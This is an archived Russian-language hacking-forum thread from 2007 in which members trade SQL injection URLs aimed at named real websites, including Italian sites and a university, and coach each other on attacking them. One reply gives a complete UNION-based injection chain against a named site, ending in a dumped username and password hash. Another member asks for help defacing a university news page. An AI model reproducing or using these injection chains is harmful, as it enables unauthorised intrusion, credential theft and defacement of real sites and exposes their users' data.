Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    Code:
    http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,table_name,4,5+from+information  _schema.tables/*
    что дальше делать не подскажите?
     
  2. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Code:
    http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat(table_schema,0x3a,table_name),4,5+from+information_schema.columns+where+column_name=0x70617373776F7264+--+
    progettocompetence_it:areariservata_utenti
    Code:
    http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_schema=0x70726F676574746F636F6D706574656E63655F6974+and+table_name=0x617265617269736572766174615F7574656E7469+limit+1,1+--+
    id
    userid
    password
    Code:
    http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat_ws(0x3a,id,userid,password),4,5+from+progettocompetence_it.areariservata_utenti+limit+0,1+--+
    1:Ilic:ff112557a3a0a4d1e74f56e0ac979467

    Крути limit ....
     
    1 person likes this.
  3. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    Code:
    http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.COLUMNS/*
    а тут что делать?
     
  4. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Аналогично вышеизложенному.
     
  5. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    а +where+co lumn_name=0x70617373776F7264+--+ откуда?
    и
    Code:
    +where+table_schema=0x70726F676574  746F636F6D706574656E63655F6974+and+table_name=0x61  7265617269736572766174615F7574656E7469+limit+1,1+--+
    откуда взяось?
     
    #365 Mike 007, 28 Nov 2007
    Last edited: 28 Nov 2007
  6. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Это hex представление столбца password
     
  7. 77oody

    77oody New Member

    Joined:
    28 Nov 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://terminovo.com/index.php?main_page=products_general_i nfo &products_id=99999999
    Фильтруются отдельные символы и буквы, через hex,char ничего не выходит.
     
    #367 77oody, 29 Nov 2007
    Last edited: 29 Nov 2007
  8. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    При чем здесь хекс или char? Там же инклуд(и то маловероятно что провернешь), а не скуля
     
  9. noneim

    noneim New Member

    Joined:
    28 Nov 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://www.millikin.edu/athletics/archives_sport.asp?SPORT=6%20and%201=1%20UNION+SELECT+1,2,3,NULL+FROM%20INFORMATION_SCHEMA.TABLES%20--

    Исключительно в образовательных целях хотелось бы изменить вот эту страничку
    Code:
    http://www.millikin.edu/media/print_release.asp?NEWS_ID=1227
    имена таблиц похоже только методом тыка.. через ; пробовал менять таблицу news - толку 0...
     
  10. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    noneim
    можно и не методом тыка ;)
    дальше наверно сам разберешся... :)

    на всякий случай прочитай:
    https://forum.antichat.ru/showthread.php?t=30501
     
  11. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://www.filmoscope.ru/?id=99999999
    помогите подобрать таблицы, до 50 подобрал не получаеться
     
  12. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    http://www.filmoscope.ru/?id=1000000000+union+select+1,2,3,4,5,6,7,8,9/*
    пользуйся "order by"
     
    1 person likes this.
  13. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    Или 'group by' )
    И еще не путай количество полей с таблицами
     
  14. v1ru$

    v1ru$ Elder - Старейшина

    Joined:
    17 Mar 2007
    Messages:
    272
    Likes Received:
    196
    Reputations:
    17
    Узнаю через order+by число столбцов,их 4
    Code:
    http://www.4ips.biz/products.php?id=7+order+by+4/*
    
    но при запросе +union+select
    Code:
    http://www.4ips.biz/products.php?id=7+union+select+1,2,3,4/*
    
    The used SELECT statements have a different number of columns

    Что это значит и что делать?
     
  15. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Это значит, что ты неправильно подобрал количество полей, попробуй подобрать через group by, либо вручную по очереди через union select
     
    2 people like this.
  16. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Совсем не факт, зачем говорить если не знаешь, эту ситуювину я описывал здесь:
    http://forum.antichat.ru/showpost.php?p=497033&postcount=21
     
    2 people like this.
  17. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    если ты подобрал кол-во столбцов, но выпадает такая ошибка, то 99% ты имеешь дело с мускулом 3-й версии
     
  18. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    а разве тогда будет ошибка связанная с кол-вом полей? я думал будет ошибка синтаксиса
     
  19. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    Code:
    http://www.rebellino.it/shop/pag_home/multimedia.php?id=-1+union+select+1,2,user(),version(),5,database()/*
    [email protected]

    Sql47718_3

    4.0.27-standard-log

    помогите пожалуйста с таблицами
     
  20. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    а разве тогда будет ошибка связанная с кол-вом полей? я думал будет ошибка синтаксиса

    не могу точно сказать почему именно такая ошибка, но я много раз сталкивался с подобной ситуацией
     
Thread Status:
Not open for further replies.